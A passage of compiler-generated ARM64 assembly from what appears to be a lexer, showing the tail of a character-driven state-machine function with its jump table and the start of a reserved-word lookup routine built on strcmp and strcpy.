x1, _strx22@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_184 b LBB1_182 LBB1_182: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_184 b LBB1_183 LBB1_183: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_184: b LBB1_257 LBB1_185: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_188 b LBB1_186 LBB1_186: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_188 b LBB1_187 LBB1_187: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #22 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_188: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_191 b LBB1_189 LBB1_189: ldursb w0, [x29, #-2] adrp x1, _strx14@PAGE add x1, x1, _strx14@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_191 b LBB1_190 LBB1_190: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #4 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_191: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_194 b LBB1_192 LBB1_192: ldursb w0, [x29, #-2] adrp x1, _strx11@PAGE add x1, x1, _strx11@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_194 b LBB1_193 LBB1_193: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #15 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_194: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_197 b LBB1_195 LBB1_195: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_197 b LBB1_196 LBB1_196: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_197: b LBB1_257 LBB1_198: ldursb w0, [x29, #-1] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_201 b LBB1_199 LBB1_199: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_201 b LBB1_200 LBB1_200: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.20@PAGE add x1, x1, l_.str.20@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_201: b LBB1_257 LBB1_202: ldursb w0, [x29, #-1] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_205 b LBB1_203 LBB1_203: ldursb w0, [x29, #-2] adrp x1, _strx21@PAGE add x1, x1, _strx21@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_205 b LBB1_204 LBB1_204: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #25 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_205: b LBB1_257 LBB1_206: ldursb w0, [x29, #-1] adrp x1, _strx21@PAGE add x1, x1, _strx21@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_209 b LBB1_207 LBB1_207: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_209 b LBB1_208 LBB1_208: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.21@PAGE add x1, x1, l_.str.21@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_209: b LBB1_257 LBB1_210: ldursb w0, [x29, #-1] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_213 b LBB1_211 LBB1_211: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_213 b LBB1_212 LBB1_212: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.22@PAGE add x1, x1, l_.str.22@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_213: ldursb w0, [x29, #-1] adrp x1, _strx28@PAGE add x1, x1, _strx28@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_216 b LBB1_214 LBB1_214: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_216 b LBB1_215 LBB1_215: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #26 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_216: b LBB1_257 LBB1_217: ldursb w0, [x29, #-1] adrp x1, _strx9@PAGE add x1, x1, _strx9@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_220 b LBB1_218 LBB1_218: ldursb w0, [x29, #-2] adrp x1, _strx9@PAGE add x1, x1, _strx9@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_220 b LBB1_219 LBB1_219: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #27 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_220: ldursb w0, [x29, #-1] adrp x1, _strx8@PAGE add x1, x1, _strx8@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_223 b LBB1_221 LBB1_221: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_223 b LBB1_222 LBB1_222: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_223: b LBB1_257 LBB1_224: ldursb w0, [x29, #-1] adrp x1, _strx16@PAGE add x1, x1, _strx16@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_227 b LBB1_225 LBB1_225: ldursb w0, [x29, #-2] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_227 b LBB1_226 LBB1_226: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #29 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_227: b LBB1_257 LBB1_228: ldursb w0, [x29, #-1] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_231 b LBB1_229 LBB1_229: ldursb w0, [x29, #-2] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_231 b LBB1_230 LBB1_230: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #29 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_231: ldursb w0, [x29, #-1] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_234 b LBB1_232 LBB1_232: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_234 b LBB1_233 LBB1_233: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.23@PAGE add x1, x1, l_.str.23@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_234: b LBB1_257 LBB1_235: ldursb w0, [x29, #-1] adrp x1, _strx18@PAGE add x1, x1, _strx18@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_238 b LBB1_236 LBB1_236: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_238 b LBB1_237 LBB1_237: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #31 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_238: b LBB1_257 LBB1_239: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_242 b LBB1_240 LBB1_240: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_242 b LBB1_241 LBB1_241: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #31 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_242: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_245 b LBB1_243 LBB1_243: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_245 b LBB1_244 LBB1_244: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.24@PAGE add x1, x1, l_.str.24@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_245: b LBB1_257 LBB1_246: ldursb w0, [x29, #-1] adrp x1, _strx17@PAGE add x1, x1, _strx17@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_249 b LBB1_247 LBB1_247: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_249 b LBB1_248 LBB1_248: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #33 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_249: b LBB1_257 LBB1_250: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_253 b LBB1_251 LBB1_251: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_253 b LBB1_252 LBB1_252: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #33 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_253: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_256 b LBB1_254 LBB1_254: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_256 b LBB1_255 LBB1_255: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.25@PAGE add x1, x1, l_.str.25@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_256: b LBB1_257 LBB1_257: ldursb w14, [x29, #-1] ldursb w13, [x29, #-1] ldursb w12, [x29, #-2] ldursb w11, [x29, #-2] adrp x8, _State@PAGE ldr w9, [x8, _State@PAGEOFF] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x14 str x10, [x9] ; implicit-def: $x10 mov x10, x13 str x10, [x9, #8] ; implicit-def: $x10 mov x10, x12 str x10, [x9, #16] ; implicit-def: $x10 mov x10, x11 str x10, [x9, #24] str x8, [x9, #32] adrp x0, l_.str.26@PAGE add x0, x0, l_.str.26@PAGEOFF bl _printf b LBB1_258 LBB1_258: ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc .p2align 2 lJTI1_0: .long LBB1_2-Ltmp0 .long LBB1_9-Ltmp0 .long LBB1_16-Ltmp0 .long LBB1_20-Ltmp0 .long LBB1_24-Ltmp0 .long LBB1_31-Ltmp0 .long LBB1_35-Ltmp0 .long LBB1_42-Ltmp0 .long LBB1_49-Ltmp0 .long LBB1_53-Ltmp0 .long LBB1_60-Ltmp0 .long LBB1_64-Ltmp0 .long LBB1_71-Ltmp0 .long LBB1_75-Ltmp0 .long LBB1_82-Ltmp0 .long LBB1_86-Ltmp0 .long LBB1_90-Ltmp0 .long LBB1_103-Ltmp0 .long LBB1_107-Ltmp0 .long LBB1_177-Ltmp0 .long LBB1_181-Ltmp0 .long LBB1_185-Ltmp0 .long LBB1_198-Ltmp0 .long LBB1_202-Ltmp0 .long LBB1_206-Ltmp0 .long LBB1_210-Ltmp0 .long LBB1_217-Ltmp0 .long LBB1_224-Ltmp0 .long LBB1_228-Ltmp0 .long LBB1_235-Ltmp0 .long LBB1_239-Ltmp0 .long LBB1_246-Ltmp0 .long LBB1_250-Ltmp0 ; -- End function .globl _reserved_words ; -- Begin function reserved_words .p2align 2 _reserved_words: ; @reserved_words .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str x1, [sp] ldr x0, [sp, #8] adrp x1, l_.str.27@PAGE add x1, x1, l_.str.27@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr x0, [sp] adrp x1, l_.str.27@PAGE add x1, x1, l_.str.27@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_2: ldr x0, [sp, #8] adrp x1, l_.str.28@PAGE add x1, x1, l_.str.28@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ldr x0, [sp] adrp x1, l_.str.28@PAGE add x1, x1, l_.str.28@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_4: ldr x0, [sp, #8] adrp x1, l_.str.29@PAGE add x1, x1, l_.str.29@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ldr x0, [sp] adrp x1, l_.str.29@PAGE add x1, x1, l_.str.29@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_6: ldr x0, [sp, #8] adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_8 b LBB2_7 LBB2_7: ldr x0, [sp] adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_8: ldr x0, [sp, #8] adrp x1, l_.str.31@PAGE add x1, x1, l_.str.31@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: ldr x0, [sp] adrp x1, l_.str.31@PAGE add x1, x1, l_.str.31@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_10: ldr x0, [sp, #8] adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_12 b LBB2_11 LBB2_11: ldr x0, [sp] adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_12: ldr x0, [sp, #8] adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_14 b LBB2_13 LBB2_13: ldr x0, [sp] adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_14: ldr x0, [sp, #8] adrp x1, l_.str.34@PAGE add x1, x1, l_.str.34@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_16 b LBB2_15 LBB2_15: ldr x0, [sp] adrp x1, l_.str.34@PAGE add x1, x1, l_.str.34@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_16: ldr x0, [sp, #8] adrp x1, l_.str.35@PAGE add x1, x1, l_.str.35@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_18 b LBB2_17 LBB2_17: ldr x0, [sp] adrp x1, l_.str.35@PAGE add x1, x1, l_.str.35@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_18: ldr x0, [sp, #8] adrp x1, l_.str.36@PAGE add x1, x1, l_.str.36@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_20 b LBB2_19 LBB2_19: ldr x0, [sp] adrp x1, l_.str.36@PAGE add x1, x1, l_.str.36@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_20: ldr x0, [sp, #8] adrp x1, l_.str.37@PAGE add x1, x1, l_.str.37@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_22 b LBB2_21 LBB2_21: ldr x0, [sp] adrp x1, l_.str.37@PAGE add x1, x1, l_.str.37@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_22: ldr x0, [sp, #8] adrp x1, l_.str.38@PAGE add x1, x1, l_.str.38@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_24 b LBB2_23 LBB2_23: ldr x0, [sp] adrp x1, l_.str.38@PAGE add x1, x1, l_.str.38@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_24: ldr x0, [sp, #8] adrp x1, l_.str.39@PAGE add x1, x1, l_.str.39@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_26 b LBB2_25 LBB2_25: ldr x0, [sp] adrp x1, l_.str.39@PAGE add x1, x1, l_.str.39@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_26: ldr x0, [sp, #8] adrp x1, l_.str.40@PAGE add x1, x1, l_.str.40@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_28 b LBB2_27 LBB2_27: ldr x0, [sp] adrp x1, l_.str.40@PAGE add x1, x1, l_.str.40@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_28: ldr x0, [sp, #8] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_30 b LBB2_29 LBB2_29: ldr x0, [sp] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_30: ldr x0, [sp, #8] adrp x1, l_.str.42@PAGE add x1, x1, l_.str.42@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_32 b LBB2_31 LBB2_31: ldr x0, [sp] adrp x1, l_.str.42@PAGE add x1, x1, l_.str.42@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_32: ldr x0, [sp, #8] adrp x1, l_.str.43@PAGE add x1, x1, l_.str.43@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_34 b LBB2_33 LBB2_33: ldr x0, [sp] adrp x1, l_.str.43@PAGE add x1, x1, l_.str.43@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_34: ldr x0, [sp, #8] adrp x1, l_.str.44@PAGE add x1, x1, l_.str.44@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_36 b LBB2_35 LBB2_35: ldr x0, [sp] adrp x1, l_.str.44@PAGE add x1, x1, l_.str.44@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_36: ldr x0, [sp, #8] adrp x1, l_.str.45@PAGE add x1, x1, l_.str.45@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_38 b LBB2_37 LBB2_37: ldr x0, [sp] adrp x1, l_.str.45@PAGE add x1, x1, l_.str.45@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_38: ldr x0, [sp, #8] adrp x1, l_.str.46@PAGE add x1, x1, l_.str.46@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_40 b LBB2_39 LBB2_39: ldr x0, [sp] adrp x1, l_.str.46@PAGE add x1, x1, l_.str.46@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_40: ldr x0, [sp, #8] adrp x1, l_.str.47@PAGE add x1, x1, l_.str.47@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_42 b LBB2_41 LBB2_41: ldr x0, [sp] adrp x1, l_.str.47@PAGE add x1, x1, l_.str.47@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_42: ldr x0, [sp, #8] adrp x1, l_.str.48@PAGE add x1, x1, l_.str.48@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_44 b LBB2_43 LBB2_43: ldr x0, [sp] adrp x1, l_.str.48@PAGE add x1, x1, l_.str.48@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_44: ldr x0, [sp, #8] adrp x1, l_.str.49@PAGE add x1, x1, l_.str.49@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_46 b LBB2_45 LBB2_45: ldr x0, [sp] adrp x1, l_.str.49@PAGE add x1, x1, l_.str.49@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_46: ldr x0, [sp, #8] adrp x1, l_.str.50@PAGE add x1, x1, l_.str.50@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_48 b LBB2_47 LBB2_47: ldr x0, [sp] adrp x1, l_.str.50@PAGE add x1, x1, l_.str.50@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_48: ldr x0, [sp, #8] adrp x1, l_.str.51@PAGE add x1, x1, l_.str.51@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_50 b LBB2_49 LBB2_49: ldr x0, [sp] adrp x1, l_.str.51@PAGE add x1, x1, l_.str.51@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_50: ldr x0, [sp, #8] adrp x1, l_.str.52@PAGE add x1, x1, l_.str.52@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_52 b LBB2_51 LBB2_51: ldr x0, [sp] adrp x1, l_.str.52@PAGE add x1, x1, l_.str.52@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_52: ldr x0, [sp, #8] adrp x1, l_.str.53@PAGE add x1, x1, l_.str.53@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_54 b LBB2_53 LBB2_53: ldr x0, [sp] adrp x1, l_.str.53@PAGE add x1, x1, l_.str.53@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_54: ldr x0, [sp, #8] adrp x1, l_.str.54@PAGE add x1, x1, l_.str.54@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_56 b LBB2_55 LBB2_55: ldr x0, [sp] adrp x1, l_.str.54@PAGE add x1, x1, l_.str.54@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_56: ldr x0, [sp, #8] adrp x1, l_.str.55@PAGE add x1, x1, l_.str.55@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_58 b LBB2_57 LBB2_57: ldr x0, [sp] adrp x1, l_.str.55@PAGE add x1, x1, l_.str.55@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_58: ldr x0, [sp, #8] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_60 b LBB2_59 LBB2_59: ldr x0, [sp] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_60: ldr x0, [sp, #8] adrp x1, l_.str.56@PAGE add x1, x1, l_.str.56@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_62 b LBB2_61 LBB2_61: ldr x0, [sp] adrp x1, l_.str.56@PAGE add x1, x1, l_.str.56@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_62: ldr x0, [sp, #8] adrp x1, l_.str.57@PAGE add x1, x1, l_.str.57@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_64 b LBB2_63 LBB2_63: ldr x0, [sp] adrp x1, l_.str.57@PAGE add x1, x1, l_.str.57@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_64: ldr x0, [sp, #8] adrp x1, l_.str.58@PAGE add x1, x1, l_.str.58@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_66 b LBB2_65 LBB2_65: ldr x0, [sp] 